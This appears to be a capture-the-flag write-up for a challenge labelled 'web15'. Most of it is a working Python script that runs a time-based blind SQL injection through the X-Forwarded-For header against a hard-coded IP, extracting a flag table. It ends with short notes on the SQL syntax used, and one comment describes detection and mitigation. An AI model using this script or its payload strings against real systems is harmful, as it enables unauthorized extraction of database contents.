代码如下
import requests
# SQL subquery that both functions below splice into their injected
# expressions (as the %s argument of length()/substr()); it is the value the
# script extracts one timing-oracle request at a time.
payload = "(select group_concat(flag) from flag)"
def getlen(payload):
# Binary-search the length of `payload`'s result using a time-based oracle.
# The probe travels in the X-Forwarded-For request header (Python 2 source,
# see the print statement at the end); the target presumably concatenates
# that header into a SQL statement -- the server code is not on this page.
# When length(payload) > mid the injected case expression calls sleep(2),
# so the only feedback channel is response latency, read as
# rq.elapsed.seconds >= 2.
#
# payload: SQL expression (a parenthesised subquery) interpolated into %s.
# Returns maxv, the upper bound the search converges to, and prints it.
# Search range is [0, 300]; the loop ends once the bounds are 0 or 1 apart.
#
# Defender's view: this traffic stands out as X-Forwarded-For values that
# carry SQL fragments (select case when ... sleep(...)) and as a burst of
# requests whose latency clusters around 2 s. The mitigation is to treat
# X-Forwarded-For as untrusted input and bind it with a parameterised
# query instead of string concatenation.
payload_length = "'+ (select case when length(%s)>%d then sleep(2) end)); -- '"
maxv = 300
minv = 0
while True:
mid = (maxv+minv)/2
rq = requests.get("http://123.206.87.240:8002/web15/",headers={"X-Forwarded-For":payload_length%(payload,mid)})
# a slow response means the injected condition held: length > mid
if rq.elapsed.seconds >= 2:
minv = mid
else:
maxv = mid
# converged: nothing left between the bounds to probe
if (maxv-minv) in [0,1]:
break
print "[+] The length is %d"%maxv
return maxv
def getchar(payload,length):
# Recover `payload`'s result character by character with the same sleep(2)
# timing oracle as getlen. For each position i (passed to SQL 1-based as
# i+1) it tries every printable ASCII code 32..126 and keeps the first one
# for which ord(substr(payload from i+1 for 1)) = char makes the server
# sleep, i.e. the response takes >= 2 s.
#
# payload: SQL expression whose value is extracted.
# length: number of positions to probe (the value getlen returned).
# Prints progress (recovered prefix padded with dots) and the final string;
# returns None.
# Behaviour note: a position whose byte is outside 32..126 matches no
# candidate and is simply not appended to result.
payload_ascii = "'+ (select case when ord(substr(%s from %d for 1))=%d then sleep(2) end)); -- '"
result = ''
for i in range(length):
for char in range(32,127):
rq = requests.get("http://123.206.87.240:8002/web15/",headers={"X-Forwarded-For":payload_ascii%(payload,i+1,char)})
# a slow response means this candidate code matched
if rq.elapsed.seconds >= 2:
result += chr(char)
print result+('.'*(length-i-1))
break
print "[+] The char is %s"%result
# Script driver, run at module level: first the length, then the characters.
leng = getlen(payload)
getchar(payload, leng)
知识点
- substr('abc' from 1 for 1)
- select case when 表达式 then 表达式 end 等价于IF(表达式,TRUE,False)
- like关键字不区分大小写且匹配时需要处理%,_。并且在本题中还不能出现,符号。